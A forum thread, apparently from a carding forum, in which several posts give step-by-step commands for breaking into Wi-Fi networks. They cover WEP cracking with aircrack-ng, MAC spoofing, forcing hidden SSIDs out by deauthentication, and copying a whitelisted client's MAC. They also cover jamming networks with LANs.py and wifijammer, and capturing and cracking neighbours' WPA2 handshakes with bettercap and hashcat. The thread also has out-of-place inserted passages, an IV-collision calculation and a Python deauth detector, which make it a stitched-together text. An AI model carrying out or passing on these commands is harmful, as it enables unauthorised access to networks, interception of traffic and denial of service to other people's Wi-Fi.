
HOW TO HACK ALL TYPE OF WI-FI

Carder

Professional
Messages
2,619
Reaction score
1,868
Points
113
Step 1:

First Download Backtrack

Step 2:

Burn the iso image on CD and boot your laptop from CD drive

Step 3:

Select the third boot option(VESA/KDE).

Step 4:

Once in BT3, click the tiny black box in the lower left corner to load up a “Konsole” window.

Step 5:

Type the following command
airmon-ng
Note down the interface name. In this example it is wifi0.

Step 6:

airmon-ng stop wifi0

Step 7:

ifconfig wifi0 down

Step 8:

macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:

airmon-ng start wifi0

Step 10:

airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Note down the BSSID, CH and ESSID somewhere in Notepad or on paper.
Note that if the same BSSID is available in the second part with a STATION associated with it,
it means someone is accessing that network and our task will be a little easier.
If not, then don't worry, we will still crack it.

Step 11:

airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0
Replace
(channel) with the CH which you had already noted
(file name) with any name of your choice
(bssid) with the BSSID which you had already noted
Leave this console as it is and start a new konsole

Step 12:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don't get the "Association successful" message, then keep on trying until you get success.

Step 13:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well, if you don't see ARP and ACK packets and the sent packets are not increasing
or are still 0, then it means no one is accessing that network.
But don't worry, you have got an optional step.
Leave this console as it is and start a new konsole.

Step 14:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:66 wifi0
Press y and Enter.
Now you will see that the ARP and ACK packets in the 2nd console are increasing fast.
Keep this console as it is and start a 4th console.

Step 15:

aircrack-ng -b (bssid) (filename)-
Just wait and watch... BackTrack will do the rest of the work.
Hurray, we got the key.

Done!⚠️

Download BackTrack
 

Carding 4 Carders

Professional
Messages
2,730
Reaction score
1,464
Points
113
HOW TO INSTALL BACKTRACK AND HACK WI-FI ON ANDROID

Ⓜ️ Requirements Ⓜ️

1. Rooted Android device (root your Android)
2. Download BackTrack ARM
3. Download BusyBox
4. Download Android VNC
5. Download Android Terminal
6. If you are using a PC then you need 7zip for extraction, otherwise you can download ZArchiver on your Android phone.

✅ Steps to install BackTrack & hack WiFi on Android

First, extract the bt5-gnome-arm.7z, copy the bt5 folder and then put it in your Android root directory. For example, my phone's root directory is /sdcard. (Different Androids will have different root directories.)
Install all apps given in the requirements.

⚜️ After installing the BusyBox application, open it and wait until it finishes loading, then click on the Smart Install button of the application.

⚜️ In your Android, open the terminal app and then execute the given commands.
su
cd /sdcard/bt5
sh bootbt
When the su command is executed it will ask for superuser access; you have to click Grant on the prompt that appears.
Now after this type the command: export USER=root unpassed

⚜️ Now you will be asked to enter the password; enter your choice and press Enter.
Now type the below command:
tightvncserver -geometry 1280x720

⚜️ The terminal emulator will create the localhost to connect it to the VNC server. Now note the localhost port marked red below. Now minimize the terminal emulator.

⚜️ Open the Android VNC and type in the following settings:
Nickname: bt5
Password: same password as entered in the terminal
Address: localhost
Port: 5906
 

Carding Forum

Professional
Messages
2,788
Reaction score
1,170
Points
113

HOW TO ACCESS A WIRELESS NETWORK?


You will need a wireless network enabled device such as a laptop, tablet, smart phones etc. You will also need to be within the transmission radius of a wireless network access point. Most devices (if the wireless network option is turned on) will provide you with a list of available networks. If the network is not password protected, then you just have to click on connect. If it is password protected, then you will need the password to gain access.

Wireless Network Authentication

Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques.

WEP

WEP is the acronym for Wired Equivalent Privacy. It was developed for the IEEE 802.11 WLAN standards. Its goal was to provide privacy equivalent to that provided by wired networks. WEP works by encrypting the data being transmitted over the network to keep it safe from eavesdropping.

WEP Authentication

Open System Authentication (OSA). This method grants access to the station requesting authentication based on the configured access policy.

Shared Key Authentication (SKA). This method sends an encrypted challenge to the station requesting access. The station encrypts the challenge with its key, then responds. If the encrypted challenge matches the AP value, then access is granted.

WEP Weakness

WEP has significant design flaws and vulnerabilities.
  • The integrity of the packets is checked using Cyclic Redundancy Check (CRC32). The CRC32 integrity check can be compromised by capturing at least two packets. The bits in the encrypted stream and the checksum can be modified by the attacker so that the packet is accepted by the authentication system. This leads to unauthorized access to the network.
  • WEP uses the RC4 encryption algorithm to create stream ciphers. The stream cipher input is made up of an initial value (IV) and a secret key. The length of the initial value (IV) is 24 bits, while the secret key can be either 40 bits or 104 bits long. The total length of both the initial value and the secret key can be either 64 bits or 128 bits. The lower possible value of the secret key makes it easy to crack.
  • Weak initial value combinations do not encrypt sufficiently. This makes them vulnerable to attacks.
  • WEP is based on passwords; this makes it vulnerable to dictionary attacks.
  • Key management is poorly implemented. Changing keys, especially on large networks, is challenging. WEP does not provide a centralized key management system.
  • The initial values can be reused.
Because of these security flaws, WEP has been deprecated in favor of WPA.

WPA

WPA is the acronym for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP. It is used to encrypt data on 802.11 WLANs. It uses a larger initial value, 48 bits instead of the 24 bits that WEP uses. It uses temporal keys to encrypt packets.

WPA Weaknesses
  • The collision avoidance implementation can be broken
  • It is vulnerable to denial of service attacks
  • Pre-shared keys use passphrases. Weak passphrases are vulnerable to dictionary attacks.
How to Crack Wireless Networks

WEP cracking

Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks, namely:
  • Passive cracking– this type of cracking has no effect on the network traffic until the WEP security has been cracked. It is difficult to detect.
  • Active cracking– this type of attack has an increased load effect on the network traffic. It is easy to detect compared to passive cracking. It is more effective compared to passive cracking.
WEP Cracking Tools

WPA Cracking

WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to crack WPA keys.

General Attack types
  • Sniffing– this involves intercepting packets as they are transmitted over a network. The captured data can then be decoded using tools such as Cain & Abel.
  • Man in the Middle (MITM) Attack– this involves eavesdropping on a network and capturing sensitive information.
  • Denial of Service Attack– the main intent of this attack is to deny legitimate users network resources. FataJack can be used to perform this type of attack. More on this in article
Cracking Wireless network WEP/WPA keys

It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.

We will provide you with basic information that can help you get started. Kali is a Linux based security operating system. It is developed on top of Ubuntu. Kali comes with a number of security tools. Kali can be used to gather information, assess vulnerabilities and perform exploits, among other things.

Some of the popular tools that Kali has include:
  • Metasploit
  • Wireshark
  • Aircrack-ng
  • NMap
  • Ophcrack
Cracking wireless network keys requires patience and the resources mentioned above. At a minimum, you will need the following tools:

  • A wireless network adapter with the capability to inject packets (Hardware)
  • Kali Operating System. You can download it from here http://www.kali.org/downloads/ (Software)
  • Be within the target network’s radius. If the users of the target network are actively using and connecting to it, then your chances of cracking it will be significantly improved.
  • Sufficient knowledge of Linux based operating systems and working knowledge of Aircrack and its various scripts.
  • Patience: cracking the keys may take some time depending on a number of factors, some of which may be beyond your control. Factors beyond your control include users of the target network using it actively as you sniff data packets.
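As an added illustration of the "initial values can be reused" weakness listed in the WEP section above (this is not part of the post): WEP's IV is 24 bits, so there are only $N = 2^{24} = 16\,777\,216$ distinct values, and by the birthday bound the probability that at least one IV has repeated after $n$ frames is

$$
P(n) \approx 1 - \exp\!\left(-\frac{n^2}{2N}\right), \qquad N = 2^{24}.
$$

Setting $P = 1/2$ gives

$$
n_{1/2} \approx \sqrt{2N\ln 2} \approx 4823 \text{ frames},
$$

so an IV repeat is expected after only a few thousand frames; any two frames sent under the same key and IV are then encrypted with the same RC4 keystream, which is the reuse the bullet refers to.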
 

Carding

Professional
Messages
2,871
Reaction score
2,308
Points
113

4 best tricks for hacking WIFI networks​


A lot has been written about hacking WIFI. But this is such a vast and interesting topic that there is always something new to say about it. After all, hacking WIFI is the beginning of almost all hackers))) So today, we have collected for you the 4 best methods of hacking WIFI networks. These methods will help you work more efficiently in your pentests!

1. Change and automatic generation of a new MAC address upon a new connection to Wi-Fi
MAC (Media Access Control) is a unique identifier issued to each unit of active equipment (that is, a network adapter, router, switch, and so on) or some of their interfaces.

The MAC is stitched into the hardware at the time of manufacture and is used on the network to identify the sender and recipient of a frame. It is assumed that when a new device appears on the network, the administrator does not have to manually set the MAC for it.

Scheme of the structure of a six-octet MAC address.

The MAC is unique (or at least should be) for each network interface. At the same time, a device may have several of them - for example, laptops have at least two of them: one for the controller for a wired Ethernet connection, the second for the Wi-Fi adapter. For a router or a switch, the addresses are unique for each port, and if it is a Wi-Fi router, then the addresses for each wireless interface will differ (for modern routers, these are 2.4 GHz and 5 GHz).

Why Change MAC?
MAC allows you to uniquely identify the device and does not change when you change the operating system - it is flashed into a microcircuit that provides a network interface.

Penetration testers and hackers hide their MAC to prevent identification of the equipment during an attack. I think you understand why this might be needed: if you use a real MAC, then it can be exposed when connected to other networks. There are also tools for mapping MACs to geographic coordinates - for example, the iSniff-GPS script from the Kali suite.

Practice
So, let's say you are using Linux. Let's see how to change MAC without using additional programs.

Open a terminal and enter the command

Code:
$ ifconfig | grep HWaddr

If you are using Ethernet, then you can see the addresses of the adapters like this:

Code:
$ ifconfig | grep ether

To temporarily change your MAC, you need to turn off the corresponding network interface. For example, for interface eth1, the command would be:

Code:
$ ifconfig eth1 down

Now you can create a new MAC.

Code:
$ ifconfig eth1 hw ether 00:00:00:00:00:11

As you can imagine, you can substitute any numbers into this template.

Now eth1 needs to be brought up again

Code:
$ ifconfig eth1 up

And the last thing - you need to check if the changes have taken effect. If you look at the MAC list again, you will see that the interface has changed. However, after restarting the computer, the old MAC value will return.

It would be convenient if the MAC changed every time you connect to the network. The NetworkManager package will help us with this. Since version 1.4, this program supports MAC spoofing, and it has many useful options.

For each group, "wired" (ethernet) and "wireless" (wifi) MAC rules are configured separately.

Also remember that a wireless adapter can be in one of two states:
  • scan - set using the property wifi.scan-rand-mac-address. By default yes, that is, during scanning, an arbitrary MAC address will be set. If you choose no, this will not happen;
  • connected to the network - set by the property wifi.cloned-mac-address, by default its value is preserve.

For the wired interface (property ethernet.cloned-mac-address) and the wireless interface in the connected state (wifi.cloned-mac-address), the following options are available:
  • explicitly specified MAC - that is, you can set your own permanent MAC;
  • permanent - use the MAC address embedded in the device (by default);
  • preserve - do not change the MAC of the device after activation (for example, if the MAC was changed by another program, then the current address will be used);
  • random - generate a random value for each connection.
NetworkManager is configured via the file /etc/NetworkManager/NetworkManager.conf. Alternatively, you can add an additional file with the .conf extension to the directory /etc/NetworkManager/conf.d (the config can be called whatever you like). I recommend the second method, because when you update, NetworkManager usually replaces the main .conf, and if you make changes to it, they will be lost.

Turn on automatic generation of random MAC addresses
If you want the MAC address to be changed every time you connect, but the same MAC was used when connecting to the same network, then you need to add a couple of lines to the config. Here they are:

Code:
[connection]
ethernet.cloned-mac-address = stable
wifi.cloned-mac-address = stable

The properties ethernet.cloned-mac-address and wifi.cloned-mac-address can be set individually or together.

You can check the values by typing ip a, and for the changes to take effect, you need to restart NetworkManager:

Code:
$ sudo systemctl restart NetworkManager

Now connect to the wireless network and check the MAC values again.

The same addresses will be generated for the same networks. If you want the addresses to be always different, the settings will be as follows:

Code:
[connection]
ethernet.cloned-mac-address = random
wifi.cloned-mac-address = random

Install a specific MAC
Let's say we need to use a specific MAC. To do this, we will again edit /etc/NetworkManager/conf.d/mac.conf.

To set the MAC for the wired interface, add the following lines:

Code:
[connection]
ethernet.cloned-mac-address = <new MAC>

To set the MAC for a wireless connection - these are:

Code:
[connection]
wifi.cloned-mac-address = <new MAC>

Instead of <new MAC>, of course, you should write the desired MAC address. And of course, you can configure the settings for wired and wireless connections at the same time.

Please note that using this method, the MAC will only change after you connect to the network. Before that, the interfaces will have their source addresses. An exception might be Wi-Fi if you've already configured spoofing as shown above. To cancel spoofing, add the following lines to the config:

Code:
[device]
wifi.scan-rand-mac-address = no

More ways to programmatically change MAC
Not only NetworkManager can change MAC. In fact, there are many ways to do this using both third-party programs and system services. To keep track of the results, change the NetworkManager settings:

Code:
[device]
wifi.scan-rand-mac-address = no

Now it will not spoof MAC while scanning wireless networks.

Since NetworkManager is not configured with ethernet.cloned-mac-address and wifi.cloned-mac-address, the default value (preserve) will be used, even if the MAC has been changed by other programs.

I will continue to run the examples in Kali Linux and change the settings for the Wi-Fi adapter. The peculiarity of all these methods is that the changes will be lost after a system reboot or after reconnecting the adapter.

Changing MAC with iproute2
We will use the ip program which is included in the iproute2 package. Let's start by checking the current MAC:

Code:
$ ip link show

In the output, after the words link/ether you will see the MAC address. First of all, turn off the corresponding interface. In my case this is wlan0.

Code:
$ sudo ip link set dev wlan0 down

Next, we go directly to MAC spoofing. You can set any value, but remember that the network can be configured so that addresses are not issued if the MAC does not match the device of some well-known manufacturer. Therefore, it is better to take a known prefix as the first three bytes and change only the second three bytes.

To change the MAC, execute the command

Code:
$ sudo ip link set dev <interface> address <MAC>

Substitute your values.

The final step is to return the interface to the up state:

Code:
$ sudo ip link set dev <interface> up

Well, to check the changes, you can write

Code:
$ ip link show <interface>

The value after link/ether should be the same as the one you set.

Change MAC with macchanger
Another option is to use the macchanger program. Here it is possible both to create a MAC that looks like the equipment of a certain manufacturer and to randomize it completely. Kali has this utility by default.

At the time of changing the MAC, as with other methods, the device should not be used, so turn it off:

Code:
$ sudo ip link set dev <interface> down

Further, I will have wlan0 as an interface, change it to your own if necessary.

To find out the MAC values, you can run the utility with the option -s:

Code:
$ sudo macchanger -s wlan0

As a result, it will print the current MAC and the one that is burned into the device (in case they do not match), and also indicate the vendor. For instance:

Code:
Current MAC:   00:c0:ca:96:cf:cb (ALFA, INC.)
Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

To change the MAC to a completely arbitrary address, there is an option -r:

Code:
$ sudo macchanger -r wlan0

In the output, a line with the new address is added to the two lines above.

To randomize the MAC without changing the first three bytes (manufacturer prefix), there is an option -e:

Code:
$ sudo macchanger -e wlan0

Well, if you want to set a new MAC yourself, use -m:

Code:
$ sudo macchanger -m <MAC> wlan0

Substitute the address you want instead of <MAC>.

Finally, to revert to the original MAC there is an option -p:

Code:
$ sudo macchanger -p wlan0

2. Discovery of hidden SSID
Some owners of hotspots configure them so that they do not broadcast their name (ESSID). This is usually done as an additional security measure. Users will not see such a network in the list of available ones, and to connect, they need to type in the name manually.

This is a weak protective measure, because at certain times the ESSID is still broadcasted in clear text.

Getting the hidden SSID with Airodump-ng
You can catch the ESSID on the air during the client's connection, and for this you need to either wait until this happens naturally, or force the process by disconnecting everyone from the access point. This is called deauthentication. Clients that have lost connection will automatically start reconnecting, and the network name will slip through in clear text.

The first step is to run airodump:

Code:
$ airodump-ng <interface>

When it picks up a new network, you will see the BSSID, name length, and channel used. For example, if the network operates on the first channel, we indicate it:

Code:
$ airodump-ng wlan0 --channel 1

In the same way as when intercepting a handshake, you can specify the -w key followed by a file name prefix. Capturing the handshake does not interfere with identifying the hidden point. Then you can either just wait for someone to connect, or deauthenticate all clients:

Code:
$ aireplay-ng -0 3 -a <BSSID> wlan0

Here -0 means bulk deauthentication, and 3 is the number of packets sent.

The result will come almost instantly, and you will see a line with the full name of the hidden access point.

3. Bypassing MAC filtering by borrowing an address from the whitelist
Airodump-ng will again help us with this task. We put the adapter into monitoring mode and execute the following commands:

Code:
$ ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
$ airodump-ng wlan0

You will see a list of networks, the number of connected clients and their MAC addresses that can be assigned to your adapter, if the network is configured with white list filtering.

It also happens that clients are not immediately visible at certain access points, since the program has not collected enough information. In this case, again, deauthentication will help you. If the hotspot has at least one client, you will see it immediately after reconnecting. And at the same time, you can intercept handshakes.

To deauthenticate, stop Airodump-ng and start it again, only with the indication of the channel of the point of interest to us.

Code:
$ airodump-ng wlan0 --channel 1

After that, send deauth packets and see what happens:

Code:
$ aireplay-ng -0 5 -a <MAC> wlan0

After the attack is complete, some of the previously unknown clients will be exposed. Copy the MAC of one of the legitimate users, write it down in the settings of your network card - and you can carry out a deliberate attack.

4. Jamming the Wi-Fi network
During a penetration test, it is sometimes necessary to drown out some of the access points. For this, I recommend using the LANs utility. It can not only jam Wi-Fi but also do other things: it spies on users, individually poisoning the ARP tables of the target machine, the router and, if necessary, the DNS server.

The jamming range strongly depends on the power of the adapter, but the script has settings that allow you to jam everyone or just one client. Everything is simple here: download and install dependencies and download the script itself.

Code:
$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan
$ git clone https://github.com/DanMcInerney/LANs.py.git
$ cd LANs.py/

Now you can run our script to start jamming.

Code:
$ python lans.py -u -p

The keys -u and -p mean active detection of the target for ARP spoofing and output of all interesting unencrypted data that they send or request. There is no -ip option here, so an ARP scan of the network will be performed and its results will be compared with the results of the live "promiscuous" capture. The result will be a list of all clients on the network.

Press Ctrl + C to stop searching once you have built a network map and looked at the list of connected clients. For the same purposes, by the way, you can successfully use Nmap.

The spot jamming option will look like this:

Code:
$ python lans.py --jam --accesspoint <Router MAC> -s <MAC to pass>

Here:
  • --jam - jam all or some 2.4 GHz wireless hotspots and clients within range; if necessary, additional arguments can be used along with this (below);
  • -s - this is how you can set a MAC that will not be deauthenticated;
  • --accesspoint - here you can enter the MAC of a specific access point that will act as a target.
Jamming all Wi-Fi networks will look like this:

Code:
$ python lans.py --jam

Jamming only one access point:

Code:
$ python lans.py --jam --accesspoint <BSSID>

Here, too, you can set some additional options:
  • ch - limit jamming to one channel;
  • directedonly - do not send deauthentication packets to the broadcast addresses of access points, but only to client/hotspot pairs;
  • accesspoint - this is how you can specify a specific access point as a target.

Another effective script for jamming Wi-Fi
It can be convenient to use the wifijammer utility to jam Wi-Fi. It is extremely easy to use, so there is almost nothing to discuss here: without parameters, it will simply drown out everything that it finds in the range of the adapter. In order not to hurt your own, you can exclude some MAC addresses with the option -s.

Install wifijammer:

Code:
$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan
$ git clone https://github.com/DanMcInerney/LANs.py.git
$ cd LANs.py/

And run:

Code:
$ sudo python2 wifijammer.py -s <MAC for exception>

That's all! I hope you found something new and interesting among the features I showed you and it will be useful to you in your work.
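An added example from the defender's side, not code from any of the posts above: a detector for the deauthentication bursts that the aireplay-ng -0, LANs.py --jam and wifijammer steps in this post produce, run over constructed 802.11 management-frame records. The frame tuples, MAC addresses and thresholds are constructed assumptions; a real sensor would feed the same tuples from a monitor-mode capture.

```python
"""Deauthentication-flood detection over 802.11 management frames.

Added example for this thread, not code from any of the posts. The frame
records, MAC addresses and thresholds below are constructed assumptions; a
real sensor would feed the same tuples from a monitor-mode capture.
"""
from collections import defaultdict, deque

# 802.11 type-0 (management) subtypes relevant here.
DEAUTH_SUBTYPE = 0xC     # Deauthentication
DISASSOC_SUBTYPE = 0xA   # Disassociation
BEACON_SUBTYPE = 0x8     # Beacon (ignored by the detector)
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed, locally administered addresses (second hex digit is 2).
AP = "02:00:00:aa:bb:cc"
AP2 = "02:00:00:dd:ee:ff"
CLIENT = "02:00:00:11:22:33"

# Constructed capture: (time_s, subtype, src, dst, bssid).
# A single deauth is normal AP housekeeping; a dozen deauths to the
# broadcast address inside half a second is what aireplay-ng -0 style
# tools produce, and what the detector should flag.
SAMPLE_FRAMES = [
    (0.00, DEAUTH_SUBTYPE, AP, CLIENT, AP),
    (5.00, BEACON_SUBTYPE, AP, BROADCAST, AP),
    (12.0, DEAUTH_SUBTYPE, AP2, CLIENT, AP2),
] + [(10.0 + 0.05 * i, DEAUTH_SUBTYPE, AP, BROADCAST, AP) for i in range(12)]


def detect_deauth_flood(frames, window_s=1.0, threshold=5):
    """Return one alert per burst of >= threshold deauth/disassoc frames
    sharing a BSSID within a sliding window of window_s seconds.

    Each alert is a dict: bssid, start (time of the first frame in the
    burst), count (frames in the burst so far) and broadcast (True if any
    frame targeted ff:ff:ff:ff:ff:ff, the signature of mass deauth).
    """
    windows = defaultdict(deque)   # bssid -> deque of (time, dst) in window
    active = {}                    # bssid -> alert dict for an ongoing burst
    alerts = []
    for t, subtype, _src, dst, bssid in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        q = windows[bssid]
        q.append((t, dst))
        while q and t - q[0][0] > window_s:   # drop frames outside the window
            q.popleft()
        if len(q) < threshold:
            active.pop(bssid, None)           # burst has tailed off
            continue
        if bssid not in active:
            alert = {
                "bssid": bssid,
                "start": q[0][0],
                "count": len(q),
                "broadcast": any(d == BROADCAST for _, d in q),
            }
            alerts.append(alert)
            active[bssid] = alert
        else:
            active[bssid]["count"] += 1
            active[bssid]["broadcast"] = active[bssid]["broadcast"] or (dst == BROADCAST)
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_FRAMES):
        print("deauth flood from BSSID %s: %d frames starting at t=%.2fs, "
              "broadcast=%s" % (a["bssid"], a["count"], a["start"], a["broadcast"]))
```

A wireless IDS would raise the same alert from a live capture; the single deauth at t=0 and the beacon are deliberately left unflagged so the threshold, not the mere presence of a deauth frame, drives the decision.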
 

Teacher

Professional
Messages
2,670
Reaction score
773
Points
113
In my past the biggest question ever was »HOW TO HACK WIFI«; well, we have many methods to do it. There are sceptics »"Bruteforcing takes too long"«, stfu, you never tried. Of course if you are using a 10k password list, then you won't have success, but if you use simple GitHub wordlists then we can rock this shit. I tried it also and it worked on a WPA2 network.


➤ WiFi USB Adapter:
• Atheros AR9271
• Ralink RT3070
• Ralink RT3572
• Realtek RTL8812AU
• Ralink RT5370N

➤ Laptop / Computer With Any Linux (Aircrack Utilities Already Installed »apt-get install aircrack-ng«)

➤ USB Male , Female Cable (https://www.amazon.com/Monoprice-15...ture_eight_browse-bin:15562491011&s=pc&sr=1-5)

➤ Time For Wordlist Creation

Sorry for the very long links.

1️⃣ Create Wordlists For Attack

Code:
$ git clone https://github.com/kennyn510/wpa2-wordlists; cd wpa2-wordlists
$ mkdir /root/wordlists
(creating wordlists folder for later)

There are many subdirectories; I am showing you how to make one wordlist with "Bigone2016":

Code:
$ gunzip *.gz
$ cat *.txt >> bigone.txt
$ awk '!(count[$0]++)' bigone.txt > bigone2.txt
$ egrep -v "^[[:space:]]*$" bigone2.txt > wordlist1.txt
$ mv -v wordlist1.txt /root/wordlists/

After this, we have unzipped, echoed everything into one txt file, removed duplicates and finally removed all blank lines. Our end result would be wordlist1.txt.

Do this for all subdirectories. After you have this, we can head over to the next step: we need to compile all text documents into one.

In the directory "/root/wordlists" I saved all compiled wordlists; now we need to compile all wordlists into one. Be careful, the wordlist creation takes time!

Code:
$ cd /root/wordlists
$ cat *.txt >> full.txt
$ awk '!(count[$0]++)' full.txt > cleaned.txt
$ egrep -v "^[[:space:]]*$" cleaned.txt > final.txt

Now let's see our lines:

Code:
$ wc -l final.txt
207329081 full.txt
(I didn't clean it)

2️⃣ Scanning For Targets

We have successfully created wordlists. Now we need to setup our computer / laptop for the scanning.
When scanning, it is important to use the USB.

Code:
$ ifconfig

My interface is for example wlan0

Code:
$ airmon-ng check kill

$ airmon-ng start wlan0

After monitor mode is enabled, we are using bettercap tool.

Code:
$ bettercap --iface wlan0mon

$ help wifi

In bettercap we are ready to go.

❕TIP: Use the USB male-female cable as a long cable, open your window and hold out your WiFi USB dongle. Now wait a while. I live in a good neighborhood; after about 10 minutes I got about 50 networks, so at least it is worth waiting here. Best is to hold the USB somehow at the open window.

Code:
$ wifi.recon on

After networks have been detected, write every minute:

Code:
$ wifi.show

To view all available networks. For example, I didn't have to do anything, not even deauth, to get my PMKID handshakes for Aircrack, but you can do that with the deauth.

3️⃣ Getting Handshake

Code:
$ wifi.deauth all

$ wifi.assoc all

Repeat commands after 1-2 minutes every time.

Code:
$ wifi.show

$ exit

4️⃣ Cracking Handshakes

The handshakes have been saved in "/root/bettercap-handshakes......" as a PCAP file.

We can take the PCAP file for manual, slow password cracking with Aircrack, or convert it to a Hashcat handshake and crack it much faster with Hashcat (which requires a very powerful computer, of course).
(I don't know the exact name of the bettercap handshake file; I'll call it bettercap-handshake.pcap here.)

Code:
$ mv -v bettercap-handshake.pcap wordlists/

$ cd wordlists

Aircrack Method:

Code:
$ aircrack-ng  -w <wordlist> <handshake>

$ aircrack-ng -w final.txt bettercap-handshake.pcap

Aircrack takes time to crack.

Hashcat Method:

Go to this website:


Select your file of handshake and convert it.
Move it in your wordlists folder and then we can begin:

Code:
$ hashcat -m 2500 -a 0 <handshake.hccapx> <wordlist> --force


$ hashcat -m 2500 -a 0 32465-3456.hccapx wordlist.txt --force

Press S for Status. If hashcat has a match with one of these hashes, we will be notified.
 